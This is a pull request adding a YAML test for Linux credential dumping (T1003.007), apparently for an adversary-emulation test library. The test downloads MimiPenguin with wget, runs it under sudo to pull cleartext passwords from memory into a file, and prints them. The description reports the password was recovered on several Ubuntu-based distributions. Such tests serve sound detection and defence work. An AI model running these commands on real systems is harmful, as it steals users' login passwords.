### PR TITLE
Adding T1003.007 Test 3 - MimiPenguin Usage

### DIFF
--- a/atomics/T1003.007/T1003.007.yaml
+++ b/atomics/T1003.007/T1003.007.yaml
@@ -104,3 +104,56 @@ atomic_tests:
       grep -i "PASS" "#{output_file}"
     cleanup_command: |
       rm -f "#{output_file}"
+- name: Capture Passwords with MimiPenguin
+  description: |
+    MimiPenguin is a tool inspired by MimiKatz that targets Linux systems affected by CVE-2018-20781 (Ubuntu-based distros and certain versions of GNOME Keyring). 
+    Upon successful execution on an affected system, MimiPenguin will retrieve passwords from memory and output them to a specified file. 
+    See https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20781. 
+    See https://www.tecmint.com/mimipenguin-hack-login-passwords-of-linux-users/#:~:text=Mimipenguin%20is%20a%20free%20and,tested%20on%20various%20Linux%20distributions.
+  supported_platforms:
+  - linux
+  input_arguments:
+    output_file:
+      description: Path where captured results will be placed
+      type: Path
+      default: /tmp/T1003.007Test3.txt
+    MimiPenguin_Location:
+      description: Path of MimiPenguin script
+      type: Path
+      default: /tmp/mimipenguin/mimipenguin_2.0-release/mimipenguin.sh
+  dependency_executor_name: sh
+  dependencies:
+  - description: |
+      MimiPenguin script must exist on disk at specified location (#{MimiPenguin_Location})
+    prereq_command: |
+      if [ -f "#{MimiPenguin_Location}" ]; then exit 0; else exit 1; fi;
+    get_prereq_command: |
+      wget -O "/tmp/mimipenguin.tar.gz" https://github.com/huntergregal/mimipenguin/releases/download/2.0-release/mimipenguin_2.0-release.tar.gz
+      mkdir /tmp/mimipenguin
+      tar -xzvf "/tmp/mimipenguin.tar.gz" -C /tmp/mimipenguin
+  - description: |
+      Strings must be installed
+    prereq_command: |
+      if [ -x "$(command -v strings --version)" ]; then exit 0; else exit 1; fi;
+    get_prereq_command: |
+      sudo apt-get -y install binutils
+  - description: |
+      Python2 must be installed
+    prereq_command: |
+      if [ -x "$(command -v python2 --version)" ]; then exit 0; else exit 1; fi;
+    get_prereq_command: |
+      sudo apt-get -y install python2       
+  - description: |
+      Libc-bin must be installed
+    prereq_command: |
+      if [ -x "$(command -v ldd --version)" ]; then exit 0; else exit 1; fi;
+    get_prereq_command: |
+      sudo apt-get -y install libc-bin        
+  executor:
+    command: |
+      sudo #{MimiPenguin_Location} > #{output_file}
+      cat #{output_file}
+    cleanup_command: |
+      rm -f #{output_file} > /dev/null
+    name: bash
+    elevation_required: true


### PR DESCRIPTION
**Details:**
Adding T1003.007 Test 3 - Capture Passwords with MimiPenguin. This test is designed to run the MimiPenguin script, which takes advantage of a vulnerability in Ubuntu-based distros, as well as certain versions of GNOME Keyring, in order to capture passwords in cleartext. Upon successful execution, user passwords will be exported to a file and displayed on-screen.

**Testing:**
Tested on Ubuntu 20.04.3, Linux Mint 23.0, and Zorin OS 16, and the atomic was able to retrieve the logged-in user's password. Also tested on Kali build 2021.4a, but no passwords were retrieved due to the vulnerability not existing in that version of Kali. 
